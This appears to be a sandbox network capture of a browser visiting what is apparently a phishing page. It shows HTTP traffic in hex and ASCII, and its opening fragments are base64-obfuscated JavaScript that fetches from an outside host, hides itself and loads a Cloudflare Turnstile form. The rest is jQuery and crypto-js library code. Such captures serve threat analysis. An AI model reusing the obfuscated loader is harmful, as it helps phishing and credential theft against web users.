bElCcWxaeTVoSnlOV0pkMEkyeGpYcmhVMHg5aHYxazgzT3czbVZuUHlodEtWLnRpY3Vyc29uLmNvbS9qbnN0cnNzanB1eGhienJyb2VxdHRuaWpPeHRDQ1FVaEZQQ1dGRFFaVkxQV0RFUEFOQlZHSUVMWVBJS1BDTE9EVk9BJywgew0KICAgIG1ldGhvZDogIkdFVCIsDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgcmV0dXJuIHJ
2024-10-30 15:05:32 UTC	1369	IN	Data Raw: 47 39 7a 61 58 52 70 64 6d 55 67 5a 47 6c 6d 5a 6d 56 79 5a 57 35 6a 5a 53 42 30 62 79 42 30 61 47 55 67 64 32 39 79 62 47 51 75 50 43 39 6b 61 58 59 2b 49 43 30 74 50 67 3d 3d 27 29 29 29 29 3b 0d 0a 76 61 72 20 6b 61 79 75 65 6f 47 46 55 63 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 0d 0a 6b 61 79 75 65 6f 47 46 55 63 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6b 61 79 75 65 6f 47 46 55 63 29 3b 0d 0a 0d 0a 7d 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 74 68 65 20 73 75 6d 20 6f 66 20 73 6d 61 6c 6c 20 65 66 66 6f 72 74 73 2c 20 72 65 70 65 61 74 65 64 20 64 61 79 20 69 6e 20 61 6e 64 20 64 61 79 20 6f 75 74 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 Data Ascii: G9zaXRpdmUgZGlmZmVyZW5jZSB0byB0aGUgd29ybGQuPC9kaXY+IC0tPg=='))));var kayueoGFUc = document.currentScript;kayueoGFUc.parentNode.removeChild(kayueoGFUc);}/* Success is the sum of small efforts, repeated day in and day out. */if(atob("aHR0cHM6Ly9
2024-10-30 15:05:32 UTC	1369	IN	Data Raw: 41 38 62 57 56 30 59 53 42 6f 64 48 52 77 4c 57 56 78 64 57 6c 32 50 53 4a 59 4c 56 56 42 4c 55 4e 76 62 58 42 68 64 47 6c 69 62 47 55 69 49 47 4e 76 62 6e 52 6c 62 6e 51 39 49 6b 6c 46 50 55 56 6b 5a 32 55 73 59 32 68 79 62 32 31 6c 50 54 45 69 50 67 30 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 4a 76 59 6d 39 30 63 79 49 67 59 32 39 75 64 47 56 75 64 44 30 69 62 6d 39 70 62 6d 52 6c 65 43 77 67 62 6d 39 6d 62 32 78 73 62 33 63 69 50 67 30 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 5a 70 5a 58 64 77 62 33 4a 30 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 33 61 57 52 30 61 44 31 6b 5a 58 5a 70 59 32 55 74 64 32 6c 6b 64 47 67 73 49 47 6c 75 61 58 52 70 59 57 77 74 63 32 4e 68 62 47 55 39 4d 53 34 77 49 Data Ascii: A8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wI
2024-10-30 15:05:32 UTC	1369	IN	Data Raw: 6a 59 57 78 6a 4b 43 34 35 4d 44 42 79 5a 57 30 67 4b 79 41 75 4d 33 5a 33 4b 54 74 39 44 51 6f 6a 63 45 52 74 51 6e 64 50 63 56 46 42 55 53 41 75 61 6e 56 7a 64 47 6c 6d 65 53 31 6a 62 32 35 30 5a 57 35 30 4c 57 4e 6c 62 6e 52 6c 63 6e 74 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 36 59 32 56 75 64 47 56 79 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 63 45 52 74 51 6e 64 50 63 56 46 42 55 53 35 74 64 43 30 31 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 33 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 33 42 45 62 55 4a 33 54 33 46 52 51 56 45 67 4c 6d 31 30 4c 54 51 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 46 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 Data Ascii: jYWxjKC45MDByZW0gKyAuM3Z3KTt9DQojcERtQndPcVFBUSAuanVzdGlmeS1jb250ZW50LWNlbnRlcntqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojcERtQndPcVFBUS5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI3BEbUJ3T3FRQVEgLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCi
2024-10-30 15:05:32 UTC	1369	IN	Data Raw: 61 57 78 31 63 6d 55 75 49 43 30 74 50 67 6f 38 5a 6d 39 79 62 53 42 70 5a 44 30 69 63 30 4e 56 63 48 64 75 53 48 42 79 61 43 49 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 5a 6c 39 30 64 58 4a 75 63 33 52 70 62 47 55 69 49 47 6c 6b 50 53 4a 6a 5a 69 49 2b 50 43 39 6b 61 58 59 2b 44 51 6f 38 49 53 30 74 49 45 52 76 62 69 59 6a 4d 44 4d 35 4f 33 51 67 59 6d 55 67 5a 47 6c 7a 64 48 4a 68 59 33 52 6c 5a 43 42 69 65 53 42 6a 63 6d 6c 30 61 57 4e 70 63 32 30 75 49 46 4a 6c 62 57 56 74 59 6d 56 79 4c 43 42 30 61 47 55 67 62 32 35 73 65 53 42 30 59 58 4e 30 5a 53 42 76 5a 69 42 7a 64 57 4e 6a 5a 58 4e 7a 49 48 4e 76 62 57 55 67 63 47 56 76 63 47 78 6c 49 47 64 6c 64 43 42 70 63 79 42 30 62 79 42 30 59 57 74 6c 49 47 45 67 59 6d 6c 30 5a 53 42 Data Ascii: aWx1cmUuIC0tPgo8Zm9ybSBpZD0ic0NVcHduSHByaCI+DQo8ZGl2IGNsYXNzPSJjZl90dXJuc3RpbGUiIGlkPSJjZiI+PC9kaXY+DQo8IS0tIERvbiYjMDM5O3QgYmUgZGlzdHJhY3RlZCBieSBjcml0aWNpc20uIFJlbWVtYmVyLCB0aGUgb25seSB0YXN0ZSBvZiBzdWNjZXNzIHNvbWUgcGVvcGxlIGdldCBpcyB0byB0YWtlIGEgYml0ZSB

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:33 UTC	650	OUT	GET /turnstile/v0/api.js?render=explicit HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://rpbr.ithbetoxi.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:33 UTC	386	IN	HTTP/1.1 302 Found Date: Wed, 30 Oct 2024 15:05:33 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/b/22755d9a86c9/api.js Server: cloudflare CF-RAY: 8dac4ddf2e97e766-DFW alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:33 UTC	652	OUT	GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://rpbr.ithbetoxi.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:33 UTC	958	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:33 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"61182885-40eb" Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 270948 Expires: Mon, 20 Oct 2025 15:05:33 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qcNagQO%2F%2FKSAQY4R5L9LVq0qb%2B6FjRZqzR2Zbn2O6vR70jOJplwc5957EAvgjtdlHU9mbcakh9DMKl7I67xzGniolfYOKV0aZ7LbW4nRLoZnWywjeaWd3fiZLxRbh66rTUBlcTgH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8dac4ddf293a83a1-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:33 UTC	411	IN	Data Raw: 37 62 66 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b Data Ascii: 7bf3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U\|\|function(h){
2024-10-30 15:05:33 UTC	1369	IN	Data Raw: 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.crea
2024-10-30 15:05:33 UTC	1369	IN	Data Raw: 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 Data Ascii: all(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)
2024-10-30 15:05:33 UTC	1369	IN	Data Raw: 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b Data Ascii: eof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4o),c=(s=t?h.ceil(s):h.max((0\|s)-this._minBufferSize,0))o,n=h.min(4*c,n);if(c){for(var a=0;a<c;
2024-10-30 15:05:33 UTC	1369	IN	Data Raw: 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 Data Ascii: ar t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b\|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)\|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)\|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)\|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0
2024-10-30 15:05:33 UTC	1369	IN	Data Raw: 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((nn>>>17)+no>>>15)+oo^((4294901760&i)i\|0)+((65535&i)*i\|0)}t[0]=I[0]+(I[7]<<16\|I[7]>>>16)+(I[6]<<16\|I[6]>>>16)\|0,t[1]=I[1]+(I[0]<<8\|I[0]>>>24)+I[7]\|0,t[2]=I[2]+(I[1]<<16\|I[1]>>>16)+(I[0]<<16\|I[0]
2024-10-30 15:05:33 UTC	1369	IN	Data Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]\|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
2024-10-30 15:05:33 UTC	1369	IN	Data Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 Data Ascii: arAt(64);return!o\|\|-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%42,c=r[t.charCodeAt(o)]>>>6-o%42,c=s\|c,i[n>>>2]\|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
2024-10-30 15:05:33 UTC	1369	IN	Data Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 Data Ascii: .sin(t+1))\|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8\|n>>>24)\|4278255360&(n<<24\|n>>>8)}var o=this
2024-10-30 15:05:33 UTC	1369	IN	Data Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:33 UTC	624	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://rpbr.ithbetoxi.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:33 UTC	610	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Wed, 30 Oct 2024 15:05:33 GMT Age: 1317595 X-Served-By: cache-lga21931-LGA, cache-dfw-kdal2120135-DFW X-Cache: HIT, HIT X-Cache-Hits: 2, 3 X-Timer: S1730300733.304908,VS0,VE0 Vary: Accept-Encoding
2024-10-30 15:05:33 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
